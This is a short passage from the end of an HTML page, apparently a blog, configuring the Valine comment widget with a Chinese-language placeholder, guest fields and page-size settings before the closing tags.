      placeholder: "来说两句吧呜呜呜",
      avatar     : 'mm',
      meta       : guest,
      pageSize   : '10' || 10,
      visitor    : false,
      lang       : '' || 'zh-cn',
      path       : location.pathname,
      recordIP   : false,
      serverURLs : ''
    });
  }, window.Valine);
});
</script>

</body>
</html>
